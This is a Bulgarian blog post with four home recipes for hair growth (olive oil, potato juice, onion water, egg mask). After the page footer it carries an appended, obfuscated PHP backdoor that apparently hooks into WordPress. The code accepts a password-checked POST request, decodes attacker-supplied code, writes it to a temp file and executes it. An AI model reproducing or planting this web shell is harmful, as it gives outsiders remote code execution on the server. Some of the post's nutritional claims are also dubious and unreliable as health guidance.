4 много лесни рецепти за растеж на косата | Косопад

4 много лесни рецепти за растеж на косата

Липсата на растеж на косата може да ни доведе до отчаяние. Често се случва да сменяме продукт след продукт, но без да виждаме желаните резултати.

Нека разгледаме някои от най- мощните природни средства, които подхранват косата и стимулират растежа й:

1. Зехтин
Използва се от времената на Древна Елада заради невероятните си свойства, полезни за здравето и красотата. Изключително полезен продукт за косата. Достатъчно е да се нанесе, да изчакаме да подейства няколко минути и да се отмие. Ето някой от полезни свойства на зехтина за косата:
– Ускорява растежа на косата заради съдържанието на витамин Е
– Има възстановяващо въздействие. Освен че подпомага растежа, помага за възстановяването на косъма. Много подходящ продукт за увредена и суха коса.
– Увеличава колагена заради високото съдържание на витамин С. По- тънката коса става по- силна и здрава. Съдържанието на витамин А помага за производството и възстановяването на клетките- майки.

2. Сок от картофи
Притежава уникални свойства, които подпомагат растежа на косата. Подобрява значително състоянието на скалпа и косъма. Предпазва от косопад. Помага за производството на нов косъм. Ето как се приготвя:
– Картофите се мият и се белят
– После се нарязват на малки парченца
– Слагат се в блендера и се разбиват на пюре. Не се притеснявайте, ако пюрето стане по- гъсто.
– Добавя се малко вода
– После се прецежда внимателно с тензух, за да остане само сокът.
– Нанася се върху скалпа и се масажира с кръгообразни движения.
– Оставяме да подейства 20- 30 минути.
– Изплаква се обилно с вода.
– Прави се веднъж седмично за най- добри резултати

3. Сок от лук
Лукът е много популярно средство срещу косопад. Придава сила и блясък на косъма. Подобрява кръвообращението и по този начин помага за растежа на косата. Подобрява производството на колаген. Ето как се приготвя:
– Слагаме водата да се вари с няколко парчета лук
– Когато водата заври, изчакваме няколко минути, за да може лукът да отдели полезните си свойства.
– После изчакваме да изстине
– Отстраняваме парчетата лук
– Плакнем косата с течността
– Изчакваме няколко минути
– Мием с шампоан

4. Маска от яйце
Яйцето съдържа витамин А, В, С и Е. Също желязо, цинк и магнезий. Подобрява растежа на косата. Помага за възстановяването на косъма и растежа на новите. Начин на приготвяне:
– Разбиваме едно яйце
– Добавя се малко зехтин – по желание
– Маската се нанася само в корените
– Оставя се да действа 3- 5 минути
– Изплаква се с вода
– Измива се както обикновено с шампоан

11. декември 2017 17:10:23 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}